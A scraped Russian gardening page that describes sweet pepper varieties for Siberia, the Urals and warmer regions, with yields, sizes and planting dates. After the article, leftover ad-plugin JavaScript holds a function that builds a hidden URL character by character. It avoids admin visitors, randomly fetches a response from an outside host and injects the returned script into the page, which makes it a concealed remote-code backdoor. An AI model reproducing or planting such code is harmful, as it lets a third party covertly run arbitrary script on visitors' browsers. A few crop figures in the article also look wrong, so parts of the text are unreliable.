Этот регион отличается резким континентальным климатом с непродолжительным летом. Поэтому здесь можно выращивать исключительно специально выведенные селекционерами супер ранние сорта или гибриды, устойчивые к холодам.

При этом для Сибири высевать культуру стоит в феврале, а месяца через два подросшие ростки пересаживают в теплицы или парники. Из-за короткого лета подходят исключительно ранние типы перцев. Для Урала высадка положена в конце мая, но снова-таки, только специальные ранние сорта успевают созреть до конца лета.

Ранние

  • «Колобок» — низкорослый куст с небольшими плодами весом до 90 г, подходят для употребления и консервирования.
  • «Монтеро» — куст высотой до 120 см, перцы красные, весом до 260 г с достаточно толстыми стенками. Неприхотлив к почве, с отличными вкусовыми качествами.
  • «Тополин» — высокорослые кусты, которые нуждаются в подвязывании к шпалерам, хотя есть и низкорослые штамбовые формы. Устойчив к болезням, высокоурожайный, плоды конические, темно-красного цвета с тонкими стенками.
  • «Винни-Пух» — скороспелый сорт с периодом созревания до 110 дней, кусты высотой не более 30 см с небольшими, собранными в пучки коническими плодами, радует дружное созревание перцев.

  • «Купец» — созревание наступает через два месяца, размеры небольшие, до 70 г, с мясистыми стенками и рекордным для культуры содержанием аскорбиновой кислоты. Урожайность до 3 килограмм с квадратного метра.
  • «Богатырь» — среднеспелый сорт для открытого грунта и теплиц, плоды достигают веса в 180 г и длины около 18 см, идеален для консервации – они отлично сохраняют вкус и сочность.
  • «Красный бык» — как и желтый, поражает своими размерами – при среднем весе перца до 200 г иногда встречаются экземпляры до 400 грамм и длиной до 20 см. Под весом урожая ветви кустов могут прогибаться и требовать подвязывания.
  • «Пионер» — созревает за 116-135 дней, плоды красного цвета конусовидной формы с острым кончиком, массой около 55 г, стенки средней толщины. Урожайность невысокая, зато культура выспевает в открытом грунте даже при достаточно неблагоприятных погодных условиях.

Толстостенные крупноплодные сорта

Особой любовью пользуются самые сочные, толстостенные перцы, которые идеальны для салатов, употребления в свежем виде, заморозки. Большинство таких сортов также подходят для термической обработки, консервации.

  • «Калифорнийское чудо». Ранний со сроком развития в 100-130 дней, культура детерминантная, но с длительным плодоношением. Плоды кубовидные, большие, с толстыми стенками (до 7 мм), выраженным ароматом, вес 80-130 грамм, для употребления в свежем виде, консервации.
  • «Белое золото» — очень толстостенный перец работы сибирских селекционеров. с Овощ ветло-желтого цвета вырастают весом до 450 грамм и толщиной перикарпия до 1 см, хотя куст небольшой – максимум 50 см.
  • «Сибирский формат» — достаточно новый гибрид также сибирских ученых. Куст высотой до 80 см, с толстым центральным стеблем, плоды кубовидные, с 3 или 4 камерами, при биологическом созревании приобретают красный цвет, толщина стенок до 1 см, вес – до 400-500 г. С одного куста можно получить до 3,5 кг урожая.
  • «Денис» — гибрид, отлично себя показавший в северных регионах благодаря вегетационному периоду в 90 дней. Куст достигает высоты 70 см, устойчив к болезням, плоды ярко-красные крупные, весом до 400 г и длиною около 18 см, с толщиной стенок 9 мм.

  • «Воловье ухо» — среднеранний сорт, после высадки первый урожай можно срывать через 70-75 суток. Растение невысокое (до 70 см), перцы сочные, ярко-красные, вес до 150 г, удлиненной формы с толстыми стенками, долго хранится, может транспортироваться.
  • «Солнце Италии» — невысокий куст высотою до 50 см с крупными (до 600 г) плодами и толщиной перикарпия до 7 мм. Универсальный сорт с нежной мякотью, хорошо хранится.
  • «Бел Гой» — позднеспелый с очень большими размерами и весом до 600 г, но при выращивании в открытом грунте размер может уменьшаться, как и объемы самого куста. Культура отличается обильной завязью и стабильно хорошей урожайностью.
  • «Блонди» — гибрид швейцарских селекционеров, скороспелый, поэтому подходит для выращивания в открытом грунте на севере России. Плоды четырехкамерные, весом до 200 г, с толщиной стенок до 8 мм, отличаются необычным золотисто-желтым цветом.

Выращивание перца в открытом грунте вызывает некоторые трудности – тут может сыграть свою негативную роль природа, угнетая рост или вызывая болезни поздними заморозками, проливными дождями либо наоборот засухой. Тем не менее, выбрав наиболее устойчивые сорта, можно в любом климате, даже суровом сибирском, получить хороший урожай сочного, вкусного, полезного перца. Удачного дачного сезона!

Лучшие сорта сладкого перца

Чтобы получить хороший урожай, нужно правильно подобрать сорт. Некоторые сорта сладкого перца отличаются холодостойкостью, что позволяет выращивать их в регионах с холодным климатом, некоторые дают высокий урожай в теплых регионах. Рассмотрим характеристику сортов, наиболее популярных в нашей стране.

Лучшие сорта сладкого перца

Гиганто Росса F1

Это теплолюбивый гибрид. Его выращивают в центральных и южных регионах, плоды собирают через 105 дней после посева. Данная овощная культура ценится за высокие показатели урожайности. Согласно описанию, с 1 кв. м собирают порядка 9-10 кг плодов сладкого перца.

Созревшие плоды насыщенно-красного цвета достигают в длину 20-25 см, толщина стенки — 8 мм. По форме они напоминают удлиненный куб. Средний вес плодов — 380 г. Встречаются экземпляры весом 500-600 г. У созревших плодов отсутствует горечь.

Перец Гиганто Росса F1 имеет универсальное назначение. Плоды одинаково хорошо подходят как для потребления в свежем виде, так и для приготовления заготовок на зиму. Еще их можно замораживать. После разморозки овощ не теряет вкусовых качеств.

Выращивание

Сладкий болгарский перец сорта Гиганто Росса F1 рекомендуют выращивать рассадным способом. Посевом семянзанимаются с 25 февраля по 10 марта. После посева контейнеры закрывают пленкой. Высадка в открытый грунт происходит не ранее 10 июня. Растения высаживают на постоянное место на расстоянии 80 см друг от друга. Ширина междурядий — 45 см.

Гиганто Росса нуждается в плодородных землях. Его формируют в два стебля.

Дольче де Испания

Этот ультраранний сорт сладкого перца вызревает за 95-97 суток. Высокорослое растение не склонно к чрезмерному образованию боковых побегов. Соответственно, всем плодам хватает солнечного света. Привлекают внимание плоды перца Дольче де Испания, длина которых составляет 23 см. Самые крупные имеют длину до 30 см.

Светло-красные плоды немного заужены книзу, имеют конусообразную форму. Ширина среднестатистического плода не превышает 7 см у основания. Толщина стенок — 6 см.

Выращивание

Испанский перец не нуждается в формировании, что значительно упрощает его выращивание. В регионах с холодным климатом овощную культуру лучше выращивать рассадным способом. В центральных и южных регионах страны можно сеять семена в открытый грунт.

При выращивании рассадным способом за 7 дней до высадки в грунт растения подкармливают комплексным удобрением, в составе которого присутствует фосфор и калий.

Фламенко F1

Родиной гибрида Фламенко F1 является Америка, однако он дает высокий урожай и в холодных регионах нашей страны.

Согласно характеристике, гибрид Фламенко относится к раннеспелым перчикам и является высокоурожайным. Фермеры, занимающиеся выращиванием данной овощной культуры, отмечают, что у нее крупные плоды с отменными вкусовыми качествами. У созревших плодов толстые стенки (порядка 9 мм). На среднерослом кусте вырастают плоды весом 200 г. Они достаточно компактные и невытянутые вниз, по форме напоминают куб. Ширина плода, окрашенного в насыщенно-красный цвет по всей его длине практически одинакова. С 1 кв. м собирают 8-10 кг плодов, пригодных для транспортировки.

Фламенко имеет универсальное назначение. Растение имеет хорошие характеристики лежкости, потому его целесообразно оставить для приготовления свежих салатов. К тому же, Фламенко присущ особый перечный аромат, который придает пикантности свежим салатам.

Выращивание

В регионах с холодным климатом высаживать рассаду в открытый грунт следует не ранее 7-8 июня. В южных регионах рассаду высаживают в грунт, как только температура воздуха достигнет 18-19°С и минует угроза заморозков. Фламенко не относится к влаголюбивым разновидностям овощной культуры, поэтому его умеренно поливают.

Высокоурожайные кусты вырастают только из качественного семенного материала, поэтому семена следует покупать в специализированных магазинах.

Фишт F1

Фишт ф1 — еще один ранний гибрид. Он вызревает за 95 дней. От высадки рассады в грунт до массового созревания овощной культуры проходит не более 70 дней. Это среднерослый сладкий перец. Куст тянется вверх, соответственно, он получается сомкнутым и не занимает много места на грядке.

Созревшие перцы окрашены в насыщенно-красный цвет, имеют глянцевую поверхность. По форме они напоминают острый перец, у них отсутствуют ярко выраженные ребра. Средний вес созревших перцев с толщиной стенки, не превышающей 6 мм, — 95 г. С 1 кв. м собирают 4 кг плодов с высокими вкусовыми качествами.

Выращивание

Данный сорт сладкого перца нуждается в легких плодородных грунтах. Кустики растут и в суглинистых почвах, однако нужно постоянно производить рыхление верхнего слоя. Лучше всего вносить в почву перепревший навоз. В теплых регионах России рассаду высаживают в грунт с 10 по 20 мая. В холодных регионах Фишт ф1 выращивают в хорошо обустроенных теплицах. Расстояние между растениями должно составлять 55 см, ширина междурядий — 40 см.

Фишт устойчив к вертициллезу.

Бон Аппетит F1

Бон Аппетит F1 — это гибрид, который ценится за вкусовые качества. Он относится к среднеспелым сортам. Урожай собирают через 110 дней после появления первых всходов. Средняя урожайность составляет 1,5 кг на 1 кв. м. По сравнению с описанием показателей урожайности других сортов, у гибрида Бон Аппетит он низкий. Сложно найти гибрид, который давал бы такие же сладкие плоды, как и Бон Аппетит. Вес созревших плодов — 200 г, что позволяет отнести Бон Аппетит F1 к крупноплодным сортам. Длина перцев цилиндрической формы, окрашенных в насыщенно-красный цвет, составляет 18 см.

Выращивание

Высокорослые кусты нуждаются в подвязывании и формировке. Посевом семян занимаются во второй половине февраля-начале марта. В Подмосковье и регионах с подобным климатом пересаживают рассаду в грунт в середине мая. В холодных регионах стоит повременить с высадкой растений в грунт либо же соорудить для них пленочное накрытие.

Самородок

Самородок — это среднеспелый сорт, который ценится за высокие вкусовые качества. На созревание овощной культуре требуется 115 дней. Созревшие перчики очень сладкие и сочные. Средняя масса 1 мясистого перчика составляет 270 г. Вес крупных экземпляров составляет 450-500 г, при этом толщина стенок красных плодов с глянцевой кожурой достигает 8 мм. Урожайность — 5 кг на 1 кв. м. Перчики используют для употребления в свежем виде и в качестве заморозки.

Выращивание

Куст высокорослый и раскидистый. Согласно описанию, перец легко переносит недостаток освещенности, поэтому, несмотря на раскидистость куста, схема его посадки такая же, как и схема сомкнутых по форме кустов (50 х 40).

Апельсин

Перец средних размеров

Этот некрупный перчик ценится за высокую урожайность и необычный вкус. Плоды, окрашенные не то в желтый, не то в оранжевый цвет, весят не более 40 г. Они имеют конусовидную форму и заужены книзу. Длина желтых перчиков составляет 8-10 см. На каждом кусте за период плодоношения образовывается более 10 плодов. Средняя урожайность — 5-7 кг с 1 кв. м.

Желтый цвет говорит о том, что овощ богат каротином. Плоды используют преимущественно для приготовления свежих салатов.

Выращивание

До посева семена перчиков Апельсин проращивают. Во время выращивания рассады производят 2-3 подкормки растений комплексными удобрениями. В регионах с теплым климатом подросшую рассаду высаживают в открытый грунт в конце мая-начале июня. В регионах с холодным климатом рассаду садят только в парники и не ранее 5 июня.

Новые сорта

Внимания заслуживает относительно новый гибрид Сиеста. Покупая семена данного сладкого перца, невозможно предугадать, какого цвета плоды появятся на кустах. Гибрид выведен на основе различных сортов, отличается высокой урожайностью и длительным периодом плодоношения.

Еще стоит обратить внимание на следующие сорта:

  • Биг Мама;
  • Калифорнийское чудо;
  • Мадонна (голландской селекции);
  • Оранжевое чудо.

Калифорнийское и оранжевое чудо — холодостойкие перцы.

Необычные сорта

  • Коллекционеров порадуют болгарские перчики Ромео, которые дают по 2 кг урожая с 1 куста.
  • Изюминкой приусадебного участка станут очень сладкие и суперранние перчики Халиф, окрашенные в лимонный цвет.
  • Сорт Тевере окрашен в желтый, а точнее, золотой цвет. Каждый мясистый золотой овощ весит до 500 г.
  • Интересно на грядке смотрятся перчики Помпео, на красной кожуре которых присутствуют темно-зеленые широкие полосы.
  • Обладатели теплиц должны обратить внимание на сорт Чудо Дерево. Индетерминантные кусты вырастают в высоту до 2 м. Это не только самый ранний, но и высокоурожайный сладкий гибрид. С одного куста собирают по 5 кг перчиков весом 60-100 г.
  • Привлекают внимание и перцы круглой формы. Высокие характеристики урожайности имеют голландские сорта Альма Паприка и Тепин. Перчики вырастают маленькими, но необычайно ароматными. Еще необычно смотрится Белый перец, цвет кожуры которого варьируется от белого до светло-красного.

Заключение

Любителям собирать ранние урожаи следует обратить внимание на сорта Анетта, Бугай, Мишка на Севере, Чардаш, Красный Кулак, Латино, Фараон, Маркони, Мегатон, Бонета, Мустанг, Ольга. Оранжевые перчики Мегатон не только рано созревают, но и имеют высокие товарные качества. Все эти скороспелые разновидности неприхотливы в уходе.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};